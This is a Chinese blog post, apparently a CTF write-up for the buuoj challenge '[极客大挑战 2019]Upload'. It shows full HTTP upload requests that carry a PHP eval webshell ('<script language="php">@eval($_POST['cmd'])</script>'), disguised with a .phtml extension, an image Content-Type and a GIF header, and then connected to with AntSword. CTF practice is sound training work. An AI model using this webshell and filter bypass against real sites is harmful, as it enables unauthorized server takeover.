首页 > 其他分享 >[极客大挑战 2019]Upload

[极客大挑战 2019]Upload

时间:2024-11-02 23:08:25浏览次数:1  
标签:极客 cn image Upload buuoj Content c2ae WebKitFormBoundaryDI5yLUuOF9usOKnq 2019

题目链接:https://buuoj.cn/challenges#[极客大挑战 2019]Upload。

打开环境,如下所示。

通过页面源代码可以发现,该网站系 PHP 架构,因此尝试直接上传一句话木马。

发现提示 "NOT!php!",因此尝试 fuzzing 一下后缀名。

发现网站可以通过了 "phtml" 的后缀名,但是提示文件内容存在字符串 "<?",因此改变文件内容,以其他的形式引入 PHP 代码。

请求包如下。

POST /upload_file.php HTTP/1.1
Host: c6fdb535-c2ae-466e-844e-5b5c44a8d7d8.node5.buuoj.cn:81
Content-Length: 334
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://c6fdb535-c2ae-466e-844e-5b5c44a8d7d8.node5.buuoj.cn:81
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryDI5yLUuOF9usOKnq
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.155 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://c6fdb535-c2ae-466e-844e-5b5c44a8d7d8.node5.buuoj.cn:81/
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: keep-alive

------WebKitFormBoundaryDI5yLUuOF9usOKnq
Content-Disposition: form-data; name="file"; filename="php.phtml"
Content-Type: image/jpeg

<script language="php">@eval($_POST['cmd'])</script>
------WebKitFormBoundaryDI5yLUuOF9usOKnq
Content-Disposition: form-data; name="submit"

提交
------WebKitFormBoundaryDI5yLUuOF9usOKnq--

发现网站又提示 "Don't lie to me, it's not image at all!!!",而网站检测一个文件是否为图片的方式有许多种,如:

  • Content-Type。
  • 文件幻数。
  • 文件后缀。
  • ...。

这里将 GIF 文件的幻数添加入上传的文件的头部,尝试再次上传,请求包如下。

POST /upload_file.php HTTP/1.1
Host: c6fdb535-c2ae-466e-844e-5b5c44a8d7d8.node5.buuoj.cn:81
Content-Length: 341
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://c6fdb535-c2ae-466e-844e-5b5c44a8d7d8.node5.buuoj.cn:81
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryDI5yLUuOF9usOKnq
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.155 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://c6fdb535-c2ae-466e-844e-5b5c44a8d7d8.node5.buuoj.cn:81/
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: keep-alive

------WebKitFormBoundaryDI5yLUuOF9usOKnq
Content-Disposition: form-data; name="file"; filename="php.phtml"
Content-Type: image/jpeg

GIF98
<script language="php">@eval($_POST['cmd'])</script>
------WebKitFormBoundaryDI5yLUuOF9usOKnq
Content-Disposition: form-data; name="submit"

提交
------WebKitFormBoundaryDI5yLUuOF9usOKnq--

发现成功上传。

因此直接使用 AntSword 连接一句话木马即可获得 WebShell(注意,成功上传的文件放置在 /upload 文件夹下)。

标签:极客,cn,image,Upload,buuoj,Content,c2ae,WebKitFormBoundaryDI5yLUuOF9usOKnq,2019
From: https://www.cnblogs.com/imtaieee/p/18522680

相关文章

  • [转]创建Visual Studio 2019离线安装包
    可以在不同的网络环境和不同的计算机上在线安装微软VisualStudio2019。微软提供的在线安装工具(VisualStudiowebinstaller)可以让用户在线下载最新版本VisualStudio安装包、补丁程序等。但是在许多场景中,用户并不能连接到互联网,或者由于防火墙的安全策略导致用户不能连接微软......
  • 地级市-计算恩格尔系数(2001-2019年)
    数据文档数据介绍数据名称:地级市-计算恩格尔系数数据年份:2001-2019年数据范围:全国297个城市数据来源:地方统计局指标说明行政区划代码人均消费支出-农村-食品地区名称人均消费支出-城镇年份人均消费支出-城镇-食品人均消费支出人均消费支出-食品人均消费支出-......
  • [GXYCTF2019]Ping Ping Ping
    题目链接:https://buuoj.cn/challenges#[GXYCTF2019]PingPingPing打开环境后如下所示。题目直接提示了有一个GET参数,参数名是"ip",尝试输入:?ip=127.0.0.1后,结果如下所示。可以看到,网站后端进行了一个ping操作,猜测参数:ip可能存在命令注入漏洞。尝试输入:ip=;id,发现可以......
  • [极客大挑战 2019]Havefun
    链接:https://buuoj.cn/challenges#[极客大挑战2019]Havefun打开环境后如下所示。在BurpSuite中(或直接CTRL+U)查看源代码后,可以发现存在如下代码。$cat=$_GET['cat'];echo$cat;if($cat=='dog'){echo'Syc{cat_cat_cat_cat}';}尝试输入Payload:?cat=dog后即可......
  • [极客大挑战 2019]EasySQL
    题目链接:https://buuoj.cn/challenges#[极客大挑战2019]EasySQL。打开后,页面如下所示:可以看到,只有一个登录框,没有其他的内容,一般这种情况,应当先考虑SQL注入。在密码框中直接插入万能密码:'or1=1;#。成功获取flag。知其然,知其所以然。一些常见的登陆功能的后端实现......
  • [GXYCTF2019]Ping Ping Ping
    题目链接:https://buuoj.cn/challenges#[GXYCTF2019]PingPingPing打开环境后如下所示。题目直接提示了有一个GET参数,参数名是"ip",尝试输入:?ip=127.0.0.1后,结果如下所示。可以看到,网站后端进行了一个ping操作,猜测参数:ip可能存在命令注入漏洞。尝试输入:ip=;id,发现可以......
  • [SUCTF 2019]EasySQL
    题目链接:https://buuoj.cn/challenges#[SUCTF2019]EasySQL打开环境后,如下所示。尝试输入字符:1。尝试输入字符:0后,发现没有输出结果。尝试输入字符串"aaa"、"bbb"等后,发现都跟输入0的结果一致,而输入123、456等非0的内容,都与输入1一致,这里可以猜测(实际上需要比较......
  • [强网杯 2019]随便注
    题目链接:https://buuoj.cn/challenges#[强网杯2019]随便注打开环境后,如下所示。通过输入',确认该处是由单引号闭合。通过输入Payload:'unionselect1;#,可以发现后端对一些关键词进行了过滤。尝试堆叠注入,可以查询到数据库名以及当前使用的数据库中存在的表名。Payload:'%......
  • upload-labs靶场Pass-21
    upload-labs靶场Pass-21本关上传方法众多,但是应该考察的是数组后缀绕过,所以我的上传围绕此展开1.分析源码$is_upload=false;//初始化上传状态为false$msg=null;//初始化消息变量为null//检查是否有文件上传if(!empty($_FILES['upload_file'])){//定义......
  • [极客大挑战 2019]Havefun
    链接:https://buuoj.cn/challenges#[极客大挑战2019]Havefun打开环境后如下所示。在BurpSuite中(或直接CTRL+U)查看源代码后,可以发现存在如下代码。$cat=$_GET['cat'];echo$cat;if($cat=='dog'){echo'Syc{cat_cat_cat_cat}';}尝试输入Payload:?cat=dog后即可......